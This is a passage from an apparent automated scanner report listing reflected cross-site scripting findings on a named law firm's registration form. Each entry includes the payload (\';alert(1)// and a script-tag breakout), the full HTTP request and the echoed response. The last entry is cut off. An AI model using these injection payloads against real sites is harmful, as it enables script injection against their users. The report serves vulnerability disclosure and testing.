   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','321752\\';alert(1)//21ef1916b41');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm(
...[SNIP]...

4.174. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcompany%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcompany%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece68\'%3balert(1)//0b41804b4b8 was submitted in the FE%5Bfe_users%5D%5Bcompany%5D parameter. This input was echoed as ece68\\';alert(1)//0b41804b4b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3ece68\'%3balert(1)//0b41804b4b8&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:35 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_form','FE[fe_users][www]','');
   updateForm('fe_users_form','FE[fe_users][company]','3ece68\\';alert(1)//0b41804b4b8');
   updateForm('fe_users_form','FE[fe_users][image]','');
   updateForm('fe_users_form','FE[fe_users][disable]','0');
   updateForm('fe_users_form','FE[fe_users][date_of_birth]','');
   updateForm('fe_users
...[SNIP]...

4.175. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bemail%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bemail%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7283e\'%3balert(1)//d945f4f3b76 was submitted in the FE%5Bfe_users%5D%5Bemail%5D parameter. This input was echoed as 7283e\\';alert(1)//d945f4f3b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com7283e\'%3balert(1)//d945f4f3b76&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:54 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27504

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
address]','3');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com7283e\\';alert(1)//d945f4f3b76');
   updateForm('fe_users_form','FE[fe_users][gender]','0');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users
...[SNIP]...

4.176. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bgender%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bgender%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afa4\'%3balert(1)//fd66386815e was submitted in the FE%5Bfe_users%5D%5Bgender%5D parameter. This input was echoed as 1afa4\\';alert(1)//fd66386815e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=01afa4\'%3balert(1)//fd66386815e&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:06 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
[telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateForm('fe_users_form','FE[fe_users][gender]','01afa4\\';alert(1)//fd66386815e');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_f
...[SNIP]...

4.177. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e75e\'%3balert(1)//0f9cda18802 was submitted in the FE%5Bfe_users%5D%5Bpassword%5D parameter. This input was echoed as 7e75e\\';alert(1)//0f9cda18802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=37e75e\'%3balert(1)//0f9cda18802&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:15 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27255

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith');
   updateForm('fe_users_form','FE[fe_users][password]','37e75e\\';alert(1)//0f9cda18802');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','3');
   updateForm('fe_users_f
...[SNIP]...

4.178. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword_again%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword_again%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60b0\'%3balert(1)//10f8d4d5446 was submitted in the FE%5Bfe_users%5D%5Bpassword_again%5D parameter. This input was echoed as b60b0\\';alert(1)//10f8d4d5446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3b60b0\'%3balert(1)//10f8d4d5446&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27309

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
teForm('fe_users_form','FE[fe_users][module_sys_dmail_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3b60b0\\';alert(1)//10f8d4d5446');
   updateForm('fe_users_form','FE[fe_users][0]','\'"-->
...[SNIP]...

4.179. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bstatic_info_country%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccd4\'%3balert(1)//f8c734f430 was submitted in the FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter. This input was echoed as 4ccd4\\';alert(1)//f8c734f430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG4ccd4\'%3balert(1)//f8c734f430&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27243

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG4ccd4\\';alert(1)//f8c734f430');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_fo
...[SNIP]...

4.180. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Btitle%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Btitle%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107b8\'%3balert(1)//d84ea8e71ea was submitted in the FE%5Bfe_users%5D%5Btitle%5D parameter. This input was echoed as 107b8\\';alert(1)//d84ea8e71ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3107b8\'%3balert(1)//d84ea8e71ea&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:43 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3107b8\\';alert(1)//d84ea8e71ea');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[
...[SNIP]...

4.181. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Busername%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

